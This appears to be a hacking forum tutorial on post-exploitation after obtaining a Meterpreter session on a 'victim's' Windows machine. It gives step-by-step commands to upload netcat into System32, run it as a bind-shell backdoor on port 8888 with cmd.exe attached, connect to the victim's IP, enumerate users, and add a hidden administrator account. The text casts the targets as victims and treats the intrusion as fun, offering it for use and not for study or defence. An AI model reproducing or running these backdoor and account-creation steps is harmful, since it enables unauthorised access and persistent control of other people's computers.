(adsbygoogle = window.adsbygoogle || []).push({}); Ok I am making this tut assuming you have managed to get a Meterpreter session on your victims computer (if you dont know what this is, g00glez it). Today we will be uploading netcat on the victims computer, executing it, and have it listening on a certain port which we will connect to. Netcat will basically be playing the role of a backdoor on the exploited system.

First off, when you get a Meterpreter session, type sessions -i 1, to begin interaction with the target computer.

You must login or register to view this content.

Now time to upload Netcat on the victims system, first locate nc.exe in your Backtrack, its in /pentest/windows_binaries/tools, copy it from there and put it on your desktop (in Backtrack desktop is known as root). Once you have done that, type upload /root/nc.exe C:\\Windows\\System32\\nc.exe, if successful you will get a prompt like below.

You must login or register to view this content.

So thats Netcat uploaded on the victims computer.

Now lets get into the command prompt of the victim, type execute -f cmd.exe -H -i, if successful you will basically be in your victims directory and ready to issue commands .

You must login or register to view this content.

Now lets execute Netcat on the victims computer, and have it running on port 8888 for us to connect to, this is Netcat playing the role of a backdoor. Type nc.exe -lvp 8888 -e cmd.exe, If successful it will tell you that Netcat is is waiting for a connection.

You must login or register to view this content.

Success, now open a new shell, and run Netcat, we will basically be attempting to connect to the victim on port 8888, which we have Netcat listening on. To do this type nc -vv (VictimsIP) 8888 (which is the port number)

You must login or register to view this content.

Voila we are in. We can browse through the victims directories by typing dir

You must login or register to view this content.

Now if we type cd \ then net user, we will see the admin and other accounts on the victims machine.

You must login or register to view this content.

Time for the fun part, lets create our own account on the hacked system , type net user vipvince pwned/add (change vipvince to your desired username, and pwned to your desired password), and to add an Administrator account on the system type, net user localgroup administrators vipvince pwned /add.

You must login or register to view this content.

There you go, so from our Meterpreter session we have created a backdoor Via netcat, and added an Administrator account on the hacked machine.

Printscreen from the hacked computer

You must login or register to view this content.